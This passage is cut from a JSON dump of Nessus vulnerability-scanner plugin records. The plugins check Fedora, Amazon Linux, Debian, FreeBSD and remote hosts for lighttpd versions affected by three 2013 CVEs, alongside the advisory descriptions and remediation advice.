fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/ Latest upstream, multiple\nsecurity fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2014-2506.NASL", "href": "https://www.tenable.com/plugins/nessus/72652", "published": "2014-02-24T00:00:00", "title": "Fedora 19 : lighttpd-1.4.34-3.fc19 (2014-2506)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-2506.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72652);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n script_bugtraq_id(63534, 63686, 63688);\n script_xref(name:\"FEDORA\", value:\"2014-2506\");\n\n script_name(english:\"Fedora 19 : lighttpd-1.4.34-3.fc19 (2014-2506)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Enable building with PIE Latest upstream, multiple security fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/ Latest upstream, multiple\nsecurity fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.lighttpd.net/2014/1/20/1-4-34/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026568\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1029666\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1029667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=879185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=955145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=994444\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128961.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c1cdbb32\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"lighttpd-1.4.34-3.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:13:55", "bulletinFamily": "scanner", "description": "Use-after-free vulnerability in lighttpd before 1.4.33 allows remote\nattackers to cause a denial of service (segmentation fault and crash)\nvia unspecified vectors that trigger FAMMonitorDirectory failures.\n\nlighttpd before 1.4.34, when SNI is enabled, configures weak SSL\nciphers, which makes it easier for remote attackers to hijack sessions\nby inserting packets into the client-server data stream or obtain\nsensitive information by sniffing the network.\n\nlighttpd before 1.4.33 does not check the return value of the (1)\nsetuid, (2) setgid, or (3) setgroups functions, which might cause\nlighttpd to run as root if it is restarted and allows remote attackers\nto gain privileges, as demonstrated by multiple calls to the clone\nfunction that cause setuid to fail when the user process limit is\nreached.", "modified": "2019-11-02T00:00:00", "id": "ALA_ALAS-2014-299.NASL", "href": "https://www.tenable.com/plugins/nessus/72947", "published": "2014-03-12T00:00:00", "title": "Amazon Linux AMI : lighttpd (ALAS-2014-299)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-299.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72947);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n script_xref(name:\"ALAS\", value:\"2014-299\");\n\n script_name(english:\"Amazon Linux AMI : lighttpd (ALAS-2014-299)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Use-after-free vulnerability in lighttpd before 1.4.33 allows remote\nattackers to cause a denial of service (segmentation fault and crash)\nvia unspecified vectors that trigger FAMMonitorDirectory failures.\n\nlighttpd before 1.4.34, when SNI is enabled, configures weak SSL\nciphers, which makes it easier for remote attackers to hijack sessions\nby inserting packets into the client-server data stream or obtain\nsensitive information by sniffing the network.\n\nlighttpd before 1.4.33 does not check the return value of the (1)\nsetuid, (2) setgid, or (3) setgroups functions, which might cause\nlighttpd to run as root if it is restarted and allows remote attackers\nto gain privileges, as demonstrated by multiple calls to the clone\nfunction that cause setuid to fail when the user process limit is\nreached.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-299.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update lighttpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-mod_geoip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-1.4.34-4.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-debuginfo-1.4.34-4.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-fastcgi-1.4.34-4.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-mod_geoip-1.4.34-4.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-mod_mysql_vhost-1.4.34-4.12.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd / lighttpd-debuginfo / lighttpd-fastcgi / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:21:15", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in the lighttpd web\nserver.\n\nIt was discovered that SSL connections with client certificates\nstopped working after the DSA-2795-1 update of lighttpd. An upstream\npatch has now been applied that provides an appropriate identifier for\nclient certificate verification.\n\n - CVE-2013-4508\n It was discovered that lighttpd uses weak ssl ciphers\n when SNI (Server Name Indication) is enabled. This issue\n was solved by ensuring that stronger ssl ciphers are\n used when SNI is selected.\n\n - CVE-2013-4559\n The clang static analyzer was used to discover privilege\n escalation issues due to missing checks around\n lighttpd", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-2795.NASL", "href": "https://www.tenable.com/plugins/nessus/70982", "published": "2013-11-21T00:00:00", "title": "Debian DSA-2795-2 : lighttpd - several vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2795. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70982);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/28 22:47:42\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n script_bugtraq_id(63534, 63686, 63688);\n script_xref(name:\"DSA\", value:\"2795\");\n\n script_name(english:\"Debian DSA-2795-2 : lighttpd - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the lighttpd web\nserver.\n\nIt was discovered that SSL connections with client certificates\nstopped working after the DSA-2795-1 update of lighttpd. An upstream\npatch has now been applied that provides an appropriate identifier for\nclient certificate verification.\n\n - CVE-2013-4508\n It was discovered that lighttpd uses weak ssl ciphers\n when SNI (Server Name Indication) is enabled. This issue\n was solved by ensuring that stronger ssl ciphers are\n used when SNI is selected.\n\n - CVE-2013-4559\n The clang static analyzer was used to discover privilege\n escalation issues due to missing checks around\n lighttpd's setuid, setgid, and setgroups calls. Those\n are now appropriately checked.\n\n - CVE-2013-4560\n The clang static analyzer was used to discover a\n use-after-free issue when the FAM stat cache engine is\n enabled, which is now fixed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=729453\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=729480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-4508\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-4559\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-4560\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/lighttpd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/lighttpd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2795\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the lighttpd packages.\n\nFor the oldstable distribution (squeeze), these problems have been\nfixed in version 1.4.28-2+squeeze1.5.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 1.4.31-4+deb7u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd\", reference:\"1.4.28-2+squeeze1.5\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-doc\", reference:\"1.4.28-2+squeeze1.5\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-cml\", reference:\"1.4.28-2+squeeze1.5\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-magnet\", reference:\"1.4.28-2+squeeze1.5\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-mysql-vhost\", reference:\"1.4.28-2+squeeze1.5\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-trigger-b4-dl\", reference:\"1.4.28-2+squeeze1.5\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-webdav\", reference:\"1.4.28-2+squeeze1.5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lighttpd\", reference:\"1.4.31-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lighttpd-doc\", reference:\"1.4.31-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lighttpd-mod-cml\", reference:\"1.4.31-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lighttpd-mod-magnet\", reference:\"1.4.31-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lighttpd-mod-mysql-vhost\", reference:\"1.4.31-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lighttpd-mod-trigger-b4-dl\", reference:\"1.4.31-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lighttpd-mod-webdav\", reference:\"1.4.31-4+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:39:01", "bulletinFamily": "scanner", "description": "lighttpd security advisories report :\n\nIt is possible to inadvertantly enable vulnerable ciphers when using\nssl.cipher-list.\n\nIn certain cases setuid() and similar can fail, potentially triggering\nlighttpd to restart running as root.\n\nIf FAMMonitorDirectory fails, the memory intended to store the context\nis released; some lines below the ", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_90B27045953011E39D09000C2980A9F3.NASL", "href": "https://www.tenable.com/plugins/nessus/72494", "published": "2014-02-14T00:00:00", "title": "FreeBSD : lighttpd -- multiple vulnerabilities (90b27045-9530-11e3-9d09-000c2980a9f3)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72494);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/11/10 11:49:43\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n\n script_name(english:\"FreeBSD : lighttpd -- multiple vulnerabilities (90b27045-9530-11e3-9d09-000c2980a9f3)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"lighttpd security advisories report :\n\nIt is possible to inadvertantly enable vulnerable ciphers when using\nssl.cipher-list.\n\nIn certain cases setuid() and similar can fail, potentially triggering\nlighttpd to restart running as root.\n\nIf FAMMonitorDirectory fails, the memory intended to store the context\nis released; some lines below the 'version' compoment of that context\nis read. Reading invalid data doesn't matter, but the memory access\ncould trigger a segfault.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_01.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_02.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_03.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/90b27045-9530-11e3-9d09-000c2980a9f3.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?17e31e6a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"lighttpd<1.4.34\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:48:19", "bulletinFamily": "scanner", "description": "According to its banner, the version of lighttpd running on the remote\nhost is prior to 1.4.34. It is, therefore, affected by the following\nvulnerabilities :\n\n - When Server Name Indication (SNI) is enabled, a flaw\n exists that could cause the application to use all\n available SSL ciphers, including weak ciphers. Remote\n attackers could potentially hijack sessions or obtain\n sensitive information by sniffing the network.\n Note only versions 1.4.24 to 1.4.33 are affected.\n (CVE-2013-4508)\n\n - A flaw exists in the clang static analyzer because it\n fails to perform checks around setuid (1), setgid (2),\n and setgroups (3) calls. This could allow a remote\n attacker to gain elevated privileges. (CVE-2013-4559)\n\n - A use-after-free error exists in the clang static\n analyzer, when the FAM stat cache engine is enabled.\n This could allow remote attackers to dereference\n already freed memory and crash the program.\n (CVE-2013-4560)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "modified": "2019-11-02T00:00:00", "id": "LIGHTTPD_1_4_34.NASL", "href": "https://www.tenable.com/plugins/nessus/72815", "published": "2014-03-05T00:00:00", "title": "lighttpd < 1.4.34 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72815);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/13 15:08:46\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n script_bugtraq_id(63534, 63686, 63688);\n\n script_name(english:\"lighttpd < 1.4.34 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version in Server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of lighttpd running on the remote\nhost is prior to 1.4.34. It is, therefore, affected by the following\nvulnerabilities :\n\n - When Server Name Indication (SNI) is enabled, a flaw\n exists that could cause the application to use all\n available SSL ciphers, including weak ciphers. Remote\n attackers could potentially hijack sessions or obtain\n sensitive information by sniffing the network.\n Note only versions 1.4.24 to 1.4.33 are affected.\n (CVE-2013-4508)\n\n - A flaw exists in the clang static analyzer because it\n fails to perform checks around setuid (1), setgid (2),\n and setgroups (3) calls. This could allow a remote\n attacker to gain elevated privileges. (CVE-2013-4559)\n\n - A use-after-free error exists in the clang static\n analyzer, when the FAM stat cache engine is enabled.\n This could allow remote attackers to dereference\n already freed memory and crash the program.\n (CVE-2013-4560)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.lighttpd.net/2014/1/20/1-4-34/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://redmine.lighttpd.net/issues/2525\");\n script_set_attribute(attribute:\"see_also\", value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_01.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_02.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_03.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to lighttpd version 1.4.34 or later. Alternatively, apply the\nvendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:lighttpd:lighttpd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"lighttpd_detect.nasl\");\n script_require_keys(\"installed_sw/lighttpd\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = 